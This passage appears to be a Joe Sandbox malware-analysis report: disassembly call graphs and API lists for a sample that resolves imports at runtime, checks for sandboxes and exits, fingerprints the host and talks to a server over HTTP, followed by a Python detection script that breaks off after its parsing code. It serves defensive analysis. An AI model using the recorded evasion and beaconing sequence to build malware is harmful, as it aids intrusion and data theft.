530bd1 26100->26103 26106 511530 8 API calls 26100->26106 26101 530ae5 26102 511530 8 API calls 26101->26102 26105 530af6 26102->26105 26104 530bfa 26103->26104 26107 511530 8 API calls 26103->26107 26108 530c23 26104->26108 26112 511530 8 API calls 26104->26112 27177 52d0f0 118 API calls 26105->27177 26110 530bb9 26106->26110 26111 530bf5 26107->26111 26114 530c4c 26108->26114 26119 511530 8 API calls 26108->26119 27180 52d7b0 104 API calls 26110->27180 27182 52dfa0 149 API calls 26111->27182 26117 530c1e 26112->26117 26115 530c75 26114->26115 26121 511530 8 API calls 26114->26121 26122 530c9e 26115->26122 26128 511530 8 API calls 26115->26128 27183 52e500 108 API calls 26117->27183 26118 530bbe 26124 511530 8 API calls 26118->26124 26120 530c47 26119->26120 27184 52e720 120 API calls 26120->27184 26127 530c70 26121->26127 26125 530cc7 26122->26125 26130 511530 8 API calls 26122->26130 26129 530bcc 26124->26129 26131 530cf0 26125->26131 26136 511530 8 API calls 26125->26136 27185 52e9e0 110 API calls 26127->27185 26133 530c99 26128->26133 27181 52ecb0 99 API calls 26129->27181 26135 530cc2 26130->26135 26137 530d04 26131->26137 26138 530dca 26131->26138 27186 517bc0 153 API calls 26133->27186 27187 52eb70 108 API calls 26135->27187 26141 530ceb 26136->26141 26142 511530 8 API calls 26137->26142 26143 511530 8 API calls 26138->26143 27188 5341e0 91 API calls 26141->27188 26147 530d2a 26142->26147 26146 530de3 26143->26146 26145 530e11 27192 5160d0 80 API calls 26145->27192 26146->26145 26148 530e09 lstrcpy 26146->26148 26149 530d56 lstrcpy 26147->26149 26150 530d5e 26147->26150 26148->26145 26149->26150 27189 5160d0 80 API calls 26150->27189 26153 530e17 27193 52c840 70 API calls 26153->27193 26154 530d64 27190 5285b0 47 API calls 26154->27190 26157 530dc2 26160 511530 8 API calls 26157->26160 26158 530d6f 26159 511530 8 API calls 26158->26159 26161 530d80 26159->26161 26164 530e39 26160->26164 27191 52d0f0 118 API calls 26161->27191 26163 530e67 27194 5160d0 80 
API calls 26163->27194 26164->26163 26165 530e5f lstrcpy 26164->26165 26165->26163 26167 530e74 26169 530e95 26167->26169 27195 531660 12 API calls 26167->27195 26169->25847 26170->25818 26172 514a76 RtlAllocateHeap 26171->26172 26174 514ab4 VirtualProtect 26172->26174 26174->25850 26177 53182e 26176->26177 26178 531855 lstrlen 26177->26178 26179 531849 lstrcpy 26177->26179 26180 531873 26178->26180 26179->26178 26181 531885 lstrcpy lstrcat 26180->26181 26182 531898 26180->26182 26181->26182 26183 5318c7 26182->26183 26184 5318bf lstrcpy 26182->26184 26185 5318ce lstrlen 26183->26185 26184->26183 26186 5318e6 26185->26186 26187 5318f2 lstrcpy lstrcat 26186->26187 26188 531906 26186->26188 26187->26188 26189 531935 26188->26189 26190 53192d lstrcpy 26188->26190 26191 53193c lstrlen 26189->26191 26190->26189 26192 531958 26191->26192 26193 53196a lstrcpy lstrcat 26192->26193 26194 53197d 26192->26194 26193->26194 26195 5319ac 26194->26195 26196 5319a4 lstrcpy 26194->26196 26197 5319b3 lstrlen 26195->26197 26196->26195 26198 5319cb 26197->26198 26199 5319eb 26198->26199 26200 5319d7 lstrcpy lstrcat 26198->26200 26201 531a1a 26199->26201 26202 531a12 lstrcpy 26199->26202 26200->26199 26203 531a21 lstrlen 26201->26203 26202->26201 26204 531a3d 26203->26204 26205 531a4f lstrcpy lstrcat 26204->26205 26206 531a62 26204->26206 26205->26206 26207 531a91 26206->26207 26208 531a89 lstrcpy 26206->26208 26209 531a98 lstrlen 26207->26209 26208->26207 26210 531ab4 26209->26210 26211 531ac6 lstrcpy lstrcat 26210->26211 26212 531ad9 26210->26212 26211->26212 26213 531b08 26212->26213 26214 531b00 lstrcpy 26212->26214 26213->25966 26214->26213 26216 512a24 SystemTimeToFileTime SystemTimeToFileTime 26215->26216 26216->25969 26216->25970 26218 53157f 26217->26218 26219 53159f lstrcpy 26218->26219 26220 5315a7 26218->26220 26219->26220 26221 5315d7 lstrcpy 26220->26221 26222 5315df 26220->26222 26221->26222 26223 53160f lstrcpy 26222->26223 26224 531617 26222->26224 26223->26224 26225 
530155 lstrlen 26224->26225 26226 531647 lstrcpy 26224->26226 26225->25987 26226->26225 26228 514a60 2 API calls 26227->26228 26229 512e82 26228->26229 26230 514a60 2 API calls 26229->26230 26231 512ea0 26230->26231 26232 514a60 2 API calls 26231->26232 26233 512eb6 26232->26233 26234 514a60 2 API calls 26233->26234 26235 512ecb 26234->26235 26236 514a60 2 API calls 26235->26236 26237 512eec 26236->26237 26238 514a60 2 API calls 26237->26238 26239 512f01 26238->26239 26240 514a60 2 API calls 26239->26240 26241 512f19 26240->26241 26242 514a60 2 API calls 26241->26242 26243 512f3a 26242->26243 26244 514a60 2 API calls 26243->26244 26245 512f4f 26244->26245 26246 514a60 2 API calls 26245->26246 26247 512f65 26246->26247 26248 514a60 2 API calls 26247->26248 26249 512f7b 26248->26249 26250 514a60 2 API calls 26249->26250 26251 512f91 26250->26251 26252 514a60 2 API calls 26251->26252 26253 512faa 26252->26253 26254 514a60 2 API calls 26253->26254 26255 512fc0 26254->26255 26256 514a60 2 API calls 26255->26256 26257 512fd6 26256->26257 26258 514a60 2 API calls 26257->26258 26259 512fec 26258->26259 26260 514a60 2 API calls 26259->26260 26261 513002 26260->26261 26262 514a60 2 API calls 26261->26262 26263 513018 26262->26263 26264 514a60 2 API calls 26263->26264 26265 513031 26264->26265 26266 514a60 2 API calls 26265->26266 26267 513047 26266->26267 26268 514a60 2 API calls 26267->26268 26269 51305d 26268->26269 26270 514a60 2 API calls 26269->26270 26271 513073 26270->26271 26272 514a60 2 API calls 26271->26272 26273 513089 26272->26273 26274 514a60 2 API calls 26273->26274 26275 51309f 26274->26275 26276 514a60 2 API calls 26275->26276 26277 5130b8 26276->26277 26278 514a60 2 API calls 26277->26278 26279 5130ce 26278->26279 26280 514a60 2 API calls 26279->26280 26281 5130e4 26280->26281 26282 514a60 2 API calls 26281->26282 26283 5130fa 26282->26283 26284 514a60 2 API calls 26283->26284 26285 513110 26284->26285 26286 514a60 2 API calls 26285->26286 26287 513126 
26286->26287 26288 514a60 2 API calls 26287->26288 26289 51313f 26288->26289 26290 514a60 2 API calls 26289->26290 26291 513155 26290->26291 26292 514a60 2 API calls 26291->26292 26293 51316b 26292->26293 26294 514a60 2 API calls 26293->26294 26295 513181 26294->26295 26296 514a60 2 API calls 26295->26296 26297 513197 26296->26297 26298 514a60 2 API calls 26297->26298 26299 5131ad 26298->26299 26300 514a60 2 API calls 26299->26300 26301 5131c6 26300->26301 26302 514a60 2 API calls 26301->26302 26303 5131dc 26302->26303 26304 514a60 2 API calls 26303->26304 26305 5131f2 26304->26305 26306 514a60 2 API calls 26305->26306 26307 513208 26306->26307 26308 514a60 2 API calls 26307->26308 26309 51321e 26308->26309 26310 514a60 2 API calls 26309->26310 26311 513234 26310->26311 26312 514a60 2 API calls 26311->26312 26313 51324d 26312->26313 26314 514a60 2 API calls 26313->26314 26315 513263 26314->26315 26316 514a60 2 API calls 26315->26316 26317 513279 26316->26317 26318 514a60 2 API calls 26317->26318 26319 51328f 26318->26319 26320 514a60 2 API calls 26319->26320 26321 5132a5 26320->26321 26322 514a60 2 API calls 26321->26322 26323 5132bb 26322->26323 26324 514a60 2 API calls 26323->26324 26325 5132d4 26324->26325 26326 514a60 2 API calls 26325->26326 26327 5132ea 26326->26327 26328 514a60 2 API calls 26327->26328 26329 513300 26328->26329 26330 514a60 2 API calls 26329->26330 26331 513316 26330->26331 26332 514a60 2 API calls 26331->26332 26333 51332c 26332->26333 26334 514a60 2 API calls 26333->26334 26335 513342 26334->26335 26336 514a60 2 API calls 26335->26336 26337 51335b 26336->26337 26338 514a60 2 API calls 26337->26338 26339 513371 26338->26339 26340 514a60 2 API calls 26339->26340 26341 513387 26340->26341 26342 514a60 2 API calls 26341->26342 26343 51339d 26342->26343 26344 514a60 2 API calls 26343->26344 26345 5133b3 26344->26345 26346 514a60 2 API calls 26345->26346 26347 5133c9 26346->26347 26348 514a60 2 API calls 26347->26348 26349 5133e2 26348->26349 
26350 514a60 2 API calls 26349->26350 26351 5133f8 26350->26351 26352 514a60 2 API calls 26351->26352 26353 51340e 26352->26353 26354 514a60 2 API calls 26353->26354 26355 513424 26354->26355 26356 514a60 2 API calls 26355->26356 26357 51343a 26356->26357 26358 514a60 2 API calls 26357->26358 26359 513450 26358->26359 26360 514a60 2 API calls 26359->26360 26361 513469 26360->26361 26362 514a60 2 API calls 26361->26362 26363 51347f 26362->26363 26364 514a60 2 API calls 26363->26364 26365 513495 26364->26365 26366 514a60 2 API calls 26365->26366 26367 5134ab 26366->26367 26368 514a60 2 API calls 26367->26368 26369 5134c1 26368->26369 26370 514a60 2 API calls 26369->26370 26371 5134d7 26370->26371 26372 514a60 2 API calls 26371->26372 26373 5134f0 26372->26373 26374 514a60 2 API calls 26373->26374 26375 513506 26374->26375 26376 514a60 2 API calls 26375->26376 26377 51351c 26376->26377 26378 514a60 2 API calls 26377->26378 26379 513532 26378->26379 26380 514a60 2 API calls 26379->26380 26381 513548 26380->26381 26382 514a60 2 API calls 26381->26382 26383 51355e 26382->26383 26384 514a60 2 API calls 26383->26384 26385 513577 26384->26385 26386 514a60 2 API calls 26385->26386 26387 51358d 26386->26387 26388 514a60 2 API calls 26387->26388 26389 5135a3 26388->26389 26390 514a60 2 API calls 26389->26390 26391 5135b9 26390->26391 26392 514a60 2 API calls 26391->26392 26393 5135cf 26392->26393 26394 514a60 2 API calls 26393->26394 26395 5135e5 26394->26395 26396 514a60 2 API calls 26395->26396 26397 5135fe 26396->26397 26398 514a60 2 API calls 26397->26398 26399 513614 26398->26399 26400 514a60 2 API calls 26399->26400 26401 51362a 26400->26401 26402 514a60 2 API calls 26401->26402 26403 513640 26402->26403 26404 514a60 2 API calls 26403->26404 26405 513656 26404->26405 26406 514a60 2 API calls 26405->26406 26407 51366c 26406->26407 26408 514a60 2 API calls 26407->26408 26409 513685 26408->26409 26410 514a60 2 API calls 26409->26410 26411 51369b 26410->26411 26412 514a60 2 
API calls 26411->26412 26413 5136b1 26412->26413 26414 514a60 2 API calls 26413->26414 26415 5136c7 26414->26415 26416 514a60 2 API calls 26415->26416 26417 5136dd 26416->26417 26418 514a60 2 API calls 26417->26418 26419 5136f3 26418->26419 26420 514a60 2 API calls 26419->26420 26421 51370c 26420->26421 26422 514a60 2 API calls 26421->26422 26423 513722 26422->26423 26424 514a60 2 API calls 26423->26424 26425 513738 26424->26425 26426 514a60 2 API calls 26425->26426 26427 51374e 26426->26427 26428 514a60 2 API calls 26427->26428 26429 513764 26428->26429 26430 514a60 2 API calls 26429->26430 26431 51377a 26430->26431 26432 514a60 2 API calls 26431->26432 26433 513793 26432->26433 26434 514a60 2 API calls 26433->26434 26435 5137a9 26434->26435 26436 514a60 2 API calls 26435->26436 26437 5137bf 26436->26437 26438 514a60 2 API calls 26437->26438 26439 5137d5 26438->26439 26440 514a60 2 API calls 26439->26440 26441 5137eb 26440->26441 26442 514a60 2 API calls 26441->26442 26443 513801 26442->26443 26444 514a60 2 API calls 26443->26444 26445 51381a 26444->26445 26446 514a60 2 API calls 26445->26446 26447 513830 26446->26447 26448 514a60 2 API calls 26447->26448 26449 513846 26448->26449 26450 514a60 2 API calls 26449->26450 26451 51385c 26450->26451 26452 514a60 2 API calls 26451->26452 26453 513872 26452->26453 26454 514a60 2 API calls 26453->26454 26455 513888 26454->26455 26456 514a60 2 API calls 26455->26456 26457 5138a1 26456->26457 26458 514a60 2 API calls 26457->26458 26459 5138b7 26458->26459 26460 514a60 2 API calls 26459->26460 26461 5138cd 26460->26461 26462 514a60 2 API calls 26461->26462 26463 5138e3 26462->26463 26464 514a60 2 API calls 26463->26464 26465 5138f9 26464->26465 26466 514a60 2 API calls 26465->26466 26467 51390f 26466->26467 26468 514a60 2 API calls 26467->26468 26469 513928 26468->26469 26470 514a60 2 API calls 26469->26470 26471 51393e 26470->26471 26472 514a60 2 API calls 26471->26472 26473 513954 26472->26473 26474 514a60 2 API calls 
26473->26474 26475 51396a 26474->26475 26476 514a60 2 API calls 26475->26476 26477 513980 26476->26477 26478 514a60 2 API calls 26477->26478 26479 513996 26478->26479 26480 514a60 2 API calls 26479->26480 26481 5139af 26480->26481 26482 514a60 2 API calls 26481->26482 26483 5139c5 26482->26483 26484 514a60 2 API calls 26483->26484 26485 5139db 26484->26485 26486 514a60 2 API calls 26485->26486 26487 5139f1 26486->26487 26488 514a60 2 API calls 26487->26488 26489 513a07 26488->26489 26490 514a60 2 API calls 26489->26490 26491 513a1d 26490->26491 26492 514a60 2 API calls 26491->26492 26493 513a36 26492->26493 26494 514a60 2 API calls 26493->26494 26495 513a4c 26494->26495 26496 514a60 2 API calls 26495->26496 26497 513a62 26496->26497 26498 514a60 2 API calls 26497->26498 26499 513a78 26498->26499 26500 514a60 2 API calls 26499->26500 26501 513a8e 26500->26501 26502 514a60 2 API calls 26501->26502 26503 513aa4 26502->26503 26504 514a60 2 API calls 26503->26504 26505 513abd 26504->26505 26506 514a60 2 API calls 26505->26506 26507 513ad3 26506->26507 26508 514a60 2 API calls 26507->26508 26509 513ae9 26508->26509 26510 514a60 2 API calls 26509->26510 26511 513aff 26510->26511 26512 514a60 2 API calls 26511->26512 26513 513b15 26512->26513 26514 514a60 2 API calls 26513->26514 26515 513b2b 26514->26515 26516 514a60 2 API calls 26515->26516 26517 513b44 26516->26517 26518 514a60 2 API calls 26517->26518 26519 513b5a 26518->26519 26520 514a60 2 API calls 26519->26520 26521 513b70 26520->26521 26522 514a60 2 API calls 26521->26522 26523 513b86 26522->26523 26524 514a60 2 API calls 26523->26524 26525 513b9c 26524->26525 26526 514a60 2 API calls 26525->26526 26527 513bb2 26526->26527 26528 514a60 2 API calls 26527->26528 26529 513bcb 26528->26529 26530 514a60 2 API calls 26529->26530 26531 513be1 26530->26531 26532 514a60 2 API calls 26531->26532 26533 513bf7 26532->26533 26534 514a60 2 API calls 26533->26534 26535 513c0d 26534->26535 26536 514a60 2 API calls 26535->26536 
26537 513c23 26536->26537 26538 514a60 2 API calls 26537->26538 26539 513c39 26538->26539 26540 514a60 2 API calls 26539->26540 26541 513c52 26540->26541 26542 514a60 2 API calls 26541->26542 26543 513c68 26542->26543 26544 514a60 2 API calls 26543->26544 26545 513c7e 26544->26545 26546 514a60 2 API calls 26545->26546 26547 513c94 26546->26547 26548 514a60 2 API calls 26547->26548 26549 513caa 26548->26549 26550 514a60 2 API calls 26549->26550 26551 513cc0 26550->26551 26552 514a60 2 API calls 26551->26552 26553 513cd9 26552->26553 26554 514a60 2 API calls 26553->26554 26555 513cef 26554->26555 26556 514a60 2 API calls 26555->26556 26557 513d05 26556->26557 26558 514a60 2 API calls 26557->26558 26559 513d1b 26558->26559 26560 514a60 2 API calls 26559->26560 26561 513d31 26560->26561 26562 514a60 2 API calls 26561->26562 26563 513d47 26562->26563 26564 514a60 2 API calls 26563->26564 26565 513d60 26564->26565 26566 514a60 2 API calls 26565->26566 26567 513d76 26566->26567 26568 514a60 2 API calls 26567->26568 26569 513d8c 26568->26569 26570 514a60 2 API calls 26569->26570 26571 513da2 26570->26571 26572 514a60 2 API calls 26571->26572 26573 513db8 26572->26573 26574 514a60 2 API calls 26573->26574 26575 513dce 26574->26575 26576 514a60 2 API calls 26575->26576 26577 513de7 26576->26577 26578 514a60 2 API calls 26577->26578 26579 513dfd 26578->26579 26580 514a60 2 API calls 26579->26580 26581 513e13 26580->26581 26582 514a60 2 API calls 26581->26582 26583 513e29 26582->26583 26584 514a60 2 API calls 26583->26584 26585 513e3f 26584->26585 26586 514a60 2 API calls 26585->26586 26587 513e55 26586->26587 26588 514a60 2 API calls 26587->26588 26589 513e6e 26588->26589 26590 514a60 2 API calls 26589->26590 26591 513e84 26590->26591 26592 514a60 2 API calls 26591->26592 26593 513e9a 26592->26593 26594 514a60 2 API calls 26593->26594 26595 513eb0 26594->26595 26596 514a60 2 API calls 26595->26596 26597 513ec6 26596->26597 26598 514a60 2 API calls 26597->26598 26599 513edc 
26598->26599 26600 514a60 2 API calls 26599->26600 26601 513ef5 26600->26601 26602 514a60 2 API calls 26601->26602 26603 513f0b 26602->26603 26604 514a60 2 API calls 26603->26604 26605 513f21 26604->26605 26606 514a60 2 API calls 26605->26606 26607 513f37 26606->26607 26608 514a60 2 API calls 26607->26608 26609 513f4d 26608->26609 26610 514a60 2 API calls 26609->26610 26611 513f63 26610->26611 26612 514a60 2 API calls 26611->26612 26613 513f7c 26612->26613 26614 514a60 2 API calls 26613->26614 26615 513f92 26614->26615 26616 514a60 2 API calls 26615->26616 26617 513fa8 26616->26617 26618 514a60 2 API calls 26617->26618 26619 513fbe 26618->26619 26620 514a60 2 API calls 26619->26620 26621 513fd4 26620->26621 26622 514a60 2 API calls 26621->26622 26623 513fea 26622->26623 26624 514a60 2 API calls 26623->26624 26625 514003 26624->26625 26626 514a60 2 API calls 26625->26626 26627 514019 26626->26627 26628 514a60 2 API calls 26627->26628 26629 51402f 26628->26629 26630 514a60 2 API calls 26629->26630 26631 514045 26630->26631 26632 514a60 2 API calls 26631->26632 26633 51405b 26632->26633 26634 514a60 2 API calls 26633->26634 26635 514071 26634->26635 26636 514a60 2 API calls 26635->26636 26637 51408a 26636->26637 26638 514a60 2 API calls 26637->26638 26639 5140a0 26638->26639 26640 514a60 2 API calls 26639->26640 26641 5140b6 26640->26641 26642 514a60 2 API calls 26641->26642 26643 5140cc 26642->26643 26644 514a60 2 API calls 26643->26644 26645 5140e2 26644->26645 26646 514a60 2 API calls 26645->26646 26647 5140f8 26646->26647 26648 514a60 2 API calls 26647->26648 26649 514111 26648->26649 26650 514a60 2 API calls 26649->26650 26651 514127 26650->26651 26652 514a60 2 API calls 26651->26652 26653 51413d 26652->26653 26654 514a60 2 API calls 26653->26654 26655 514153 26654->26655 26656 514a60 2 API calls 26655->26656 26657 514169 26656->26657 26658 514a60 2 API calls 26657->26658 26659 51417f 26658->26659 26660 514a60 2 API calls 26659->26660 26661 514198 26660->26661 
(Control-flow graph of 00514C70 and its callees; the graph edge data is omitted here because the report renders it as an image. Recoverable call sequence:) a long straight-line run of calls into 00514A60 (2 API calls each) between 005141AE and 00514A4A; 005366E0 resolves imports with repeated GetProcAddress; 00511530 and 00511610 copy strings with lstrcpy; 0052F1B0 builds and compares strings with lstrlen, lstrcpy, StrCmpCA and Sleep; 00532785 calls GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA. 00514C70 itself: lstrcpy, InternetOpenA, StrCmpCA; 00514BC0 (??2@YAPAXI x3, lstrlen, InternetCrackUrlA); 00533E70 (GetSystemTime); InternetConnectA; HttpOpenRequestA; request body assembled through 00537310, 00537280 and 005372C0 (lstrlen, lstrcpy, lstrcat); lstrlen, lstrlen, HttpSendRequestA, InternetReadFile in a loop, InternetCloseHandle; then CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree. 00528CC6: ExitProcess; 00528CCD: a series of lstrlen and StrCmpCA checks, then lstrcpy. Other functions in the graph: 005331F0 GetSystemInfo wsprintfA; 00532B60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA; 00532C10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA; 00533130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey; 00534480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy; 005330A0 GetSystemPowerStatus; 005329A0 GetCurrentProcess IsWow64Process; 0053A280 __CxxFrameHandler; 00539711 __setmbcp; 0053749E memset.
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00514C7F
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514CD2
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514D05
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514D35
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514D73
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00514DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 18ef7441e5ff24d329ddf290ad56e1c7fbe9ff7980a28b9c2cac951e2dc55ea3
                          • Instruction ID: a79d9f60523792416533519965030bb1af454f3c4082a142e68a70e24a88efe2
                          • Opcode Fuzzy Hash: 18ef7441e5ff24d329ddf290ad56e1c7fbe9ff7980a28b9c2cac951e2dc55ea3
                          • Instruction Fuzzy Hash: 4A527C7590021A9BEB21EFB4DC49AEE7FBABF85300F045425F905A7251DB74DC828F90

                          Control-flow Graph

                          (Graph edge data omitted; the report renders it as an image in which executed and non-executed blocks are distinguished only by colour.) 00536390: reads the PEB (00536390-005363BD); either calls 005362F0 and resolves twenty exports with GetProcAddress from a single module base (005363C3-005365BE) or skips that block; calls LoadLibraryA five times (005365C3-00536623); then five conditional blocks resolve one, two, one, one and two further exports with GetProcAddress (00536625-005366D2), the last of them NtQueryInformationProcess, before returning at 005366D7.
                          APIs
                          • GetProcAddress.KERNEL32(75900000,011A06D8), ref: 005363E9
                          • GetProcAddress.KERNEL32(75900000,011A0648), ref: 00536402
                          • GetProcAddress.KERNEL32(75900000,011A05B8), ref: 0053641A
                          • GetProcAddress.KERNEL32(75900000,011A0750), ref: 00536432
                          • GetProcAddress.KERNEL32(75900000,011A88C0), ref: 0053644B
                          • GetProcAddress.KERNEL32(75900000,01196940), ref: 00536463
                          • GetProcAddress.KERNEL32(75900000,01196720), ref: 0053647B
                          • GetProcAddress.KERNEL32(75900000,011A0768), ref: 00536494
                          • GetProcAddress.KERNEL32(75900000,011A0660), ref: 005364AC
                          • GetProcAddress.KERNEL32(75900000,011A07E0), ref: 005364C4
                          • GetProcAddress.KERNEL32(75900000,011A07F8), ref: 005364DD
                          • GetProcAddress.KERNEL32(75900000,01196740), ref: 005364F5
                          • GetProcAddress.KERNEL32(75900000,011A0810), ref: 0053650D
                          • GetProcAddress.KERNEL32(75900000,011A05A0), ref: 00536526
                          • GetProcAddress.KERNEL32(75900000,01196A20), ref: 0053653E
                          • GetProcAddress.KERNEL32(75900000,011A0780), ref: 00536556
                          • GetProcAddress.KERNEL32(75900000,011A0558), ref: 0053656F
                          • GetProcAddress.KERNEL32(75900000,01196780), ref: 00536587
                          • GetProcAddress.KERNEL32(75900000,011A0798), ref: 0053659F
                          • GetProcAddress.KERNEL32(75900000,011967A0), ref: 005365B8
                          • LoadLibraryA.KERNEL32(011A0840,?,?,?,00531C03), ref: 005365C9
                          • LoadLibraryA.KERNEL32(011A0570,?,?,?,00531C03), ref: 005365DB
                          • LoadLibraryA.KERNEL32(011A0588,?,?,?,00531C03), ref: 005365ED
                          • LoadLibraryA.KERNEL32(011A06F0,?,?,?,00531C03), ref: 005365FE
                          • LoadLibraryA.KERNEL32(011A0600,?,?,?,00531C03), ref: 00536610
                          • GetProcAddress.KERNEL32(75070000,011A0618), ref: 0053662D
                          • GetProcAddress.KERNEL32(75FD0000,011A0678), ref: 00536649
                          • GetProcAddress.KERNEL32(75FD0000,011A8F88), ref: 00536661
                          • GetProcAddress.KERNEL32(75A50000,011A8F58), ref: 0053667D
                          • GetProcAddress.KERNEL32(74E50000,01196840), ref: 00536699
                          • GetProcAddress.KERNEL32(76E80000,011A88B0), ref: 005366B5
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 005366CC
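                          The API reference lists in this report (the list above for 00536390, the one for 00514C70 earlier, and the 00531BF0 list further down) are regular enough to be parsed and matched against behavioural rules outside the sandbox. The script below is an added example written for this page; it is not part of the report or of Joe Sandbox. It parses lines in exactly that format and flags three things present in this sample: an ordered WinINet sequence (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile) of the kind 00514C70 uses for its request/response exchange, ExitProcess calls listed directly after an environment probe (GetSystemInfo, GlobalMemoryStatusEx, VirtualAllocExNuma, GetUserDefaultLangID) as in 00531BF0, and bursts of GetProcAddress against one module base as in 00536390. The embedded sample input mixes lines copied from the report with constructed lines for the WinINet calls; the ref addresses of the constructed lines are taken from the graph's block labels rather than instruction addresses and are an assumption, and the cut-off of ten GetProcAddress calls is an arbitrary, assumed threshold.

```python
import re
from collections import defaultdict

# One "APIs" reference line as the Joe Sandbox IDA plugin prints it, e.g.
#   • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514C7F
#   • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A06D8), ref: 005363E9
#   • ExitProcess.KERNEL32 ref: 00531C67
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

# Sample input (constructed for this example, not a file from the report):
# lines copied from the report's list for 00531BF0, with its 00536390 subcall
# lines cut to the first ten, followed by CONSTRUCTED lines in the same format
# for the WinINet sequence in the 00514C70 graph (refs are that graph's block
# addresses, not instruction addresses; unknown arguments are written as ?).
SAMPLE = """\
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A06D8), ref: 005363E9
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0648), ref: 00536402
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A05B8), ref: 0053641A
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0750), ref: 00536432
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A88C0), ref: 0053644B
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,01196940), ref: 00536463
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,01196720), ref: 0053647B
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0768), ref: 00536494
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0660), ref: 005364AC
• Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A07E0), ref: 005364C4
• lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00531C2F
• ExitProcess.KERNEL32 ref: 00531C67
• GetSystemInfo.KERNEL32(?), ref: 00531C71
• ExitProcess.KERNEL32 ref: 00531C7F
• Part of subcall function 00511030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00511046
• Part of subcall function 00511030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0051104D
• Part of subcall function 00511030: ExitProcess.KERNEL32 ref: 00511058
• Part of subcall function 005110C0: GlobalMemoryStatusEx.KERNEL32 ref: 005110EA
• Part of subcall function 005110C0: ExitProcess.KERNEL32 ref: 00511114
• GetUserDefaultLangID.KERNEL32 ref: 00531C8F
• ExitProcess.KERNEL32 ref: 00531CB2
• ExitProcess.KERNEL32 ref: 00531CE1
• lstrcpy.KERNEL32(00000000,?), ref: 00514C7F
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00514DB6
• InternetConnectA.WININET(?), ref: 00515121
• HttpOpenRequestA.WININET(?), ref: 00515150
• HttpSendRequestA.WININET(?), ref: 005153B1
• InternetReadFile.WININET(?), ref: 0051547A
• InternetCloseHandle.WININET(?), ref: 0051549C
• CryptStringToBinaryA.CRYPT32(?), ref: 005154B8
• LocalAlloc.KERNEL32(?), ref: 005154E8
"""

def parse_api_line(line):
    """One reference line -> dict, or None for headers and other text."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {"api": m.group("api"), "module": m.group("mod"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None}

def parse_trace(text):
    """All reference lines in `text`, in the order the report lists them."""
    return [c for c in map(parse_api_line, text.splitlines()) if c]

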